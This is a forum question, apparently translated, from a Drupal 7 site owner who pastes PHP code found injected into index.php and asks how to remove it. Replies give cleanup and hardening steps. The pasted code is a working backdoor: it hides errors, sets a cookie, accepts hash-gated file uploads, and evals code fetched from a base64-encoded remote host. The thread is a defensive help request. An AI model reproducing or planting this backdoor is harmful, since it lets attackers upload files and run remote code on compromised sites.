Answer the question
In order to leave comments, you need to log in
How to catch a virus on a Drupal 7 website?
It all started very suddenly, in some miraculous way, this code is sewn into index.php ..
ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
eval(file_get_contents(base64_decode('aHR0cDovLzAyby5vcmcvdy8/dT0=').$sh.'&c='.$c));
}
Answer the question
In order to leave comments, you need to log in
0. Always update in a timely manner.
1. Remove all contributory modules and core, and reinstall from drupal.org.
2. Check if there are any extra users with high rights.
3. Check if php_filter is used, if it is used somewhere, remake and disable it completely. Also, if the publication is available to users, check that the most restrictive input filters are used.
4. Conduct an audit of self-written modules, if any, and design themes.
5. If possible, disable the execution of php scripts in the sites/*/files folder at the web server configuration level (not .htaccess)
6. If possible, make sure that the user under which the web server is running has write access only to sites/*/files, and a temporary folder outside the site root, and make all updates through drush, for example, already under the owner files.
Drupal is now often broken, and it has enough vulnerabilities. It is quite possible that you are missing something and it is through the remaining 1 virus file that everything reappears
0. Make a full site backup (files + database)
1. Use the hacked module to find modified files https://www.drupal.org/project/hacked
2. Check that there are no "left" PHP files unrelated to Drupal (they can be loaded into any module).
3. Check all nodes, blocks, users, fields, etc. If this is not possible manually, then some kind of script is needed.
4. Check users and their roles. Both left users and roles in Drupal can be added.
5. Update Drupal and all modules to the latest version https://www.drupal.org/project/drupal/releases/7.58
6. Change admin passwords
See details here: https://www.drupal.org/docs/develop/ security/your-...
Try to scan with the ai-bolit script (or similar), it will show where the shells are. Then update completely and change passwords.
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question